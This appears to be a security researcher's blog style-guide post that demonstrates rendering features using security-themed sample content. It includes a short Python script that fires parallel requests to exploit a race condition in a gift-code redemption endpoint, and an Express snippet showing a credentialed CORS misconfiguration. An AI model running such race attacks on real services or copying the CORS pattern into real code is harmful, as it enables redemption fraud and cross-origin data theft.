Chris McD0nald · ~/blog
back

Style Guide: What This Blog Can Render

·2 min read
meta
#On this page

This post is a living reference for every formatting feature this blog supports. I use it to test rendering after changes and as a quick lookup when writing new posts.

Code Blocks

Syntax-highlighted code with a file title:

exploit.py
import httpx
import asyncio
 
async def race_condition(target: str, token: str):
    """Send parallel requests to exploit a TOCTOU window."""
    async with httpx.AsyncClient() as client:
        tasks = [
            client.post(
                f"{target}/api/redeem",
                json={"code": token},
            )
            for _ in range(20)
        ]
        results = await asyncio.gather(*tasks)
        succeeded = [r for r in results if r.status_code == 200]
        print(f"Redeemed {len(succeeded)} times (expected: 1)")
 
asyncio.run(race_condition("https://target.example", "GIFT-1234"))

Inline code: process.env.SECRET_KEY or x-forwarded-for.

Highlighted Lines

Draw attention to specific lines:

app.use((req, res, next) => {
  const origin = req.headers.origin;
  // These two lines are the vulnerability:
  res.setHeader("Access-Control-Allow-Origin", origin);
  res.setHeader("Access-Control-Allow-Credentials", "true");
  next();
});

Callouts

[INFO]

Informational: helpful context or background.

[WARN]

Warning: the technique described can be destructive in production.

[CRIT]

Danger: do not run this against systems you don't own.

Tables

MethodEndpointAuth
GET/api/usersBearer token
POST/api/usersAdmin only
DELETE/api/users/:idAdmin only

Footnotes

Security research often needs citations1 and asides2.

Blockquotes

The most dangerous bugs aren't the ones that crash your program. They're the ones that silently do the wrong thing.

Task Lists

  • Reproduce the vulnerability
  • Document the attack surface
  • Write the vendor notification
  • Coordinate disclosure timeline

Lists and Emphasis

A few ground rules for responsible disclosure:

  1. Always get authorization before testing
  2. Document everything: timestamps, requests, responses
  3. Report through official channels, not Twitter
  4. Give vendors reasonable time to patch

Some resources I reference often:

This post gets updated as I add new rendering features. If something looks off, that's a bug. Let me know.

Footnotes

  1. Like this one: a reference to supporting material.

  2. Or this: a tangential thought that would break the flow inline.

newer A Look at Hook Execution in Orca's orca.yaml
all posts
share:HNpost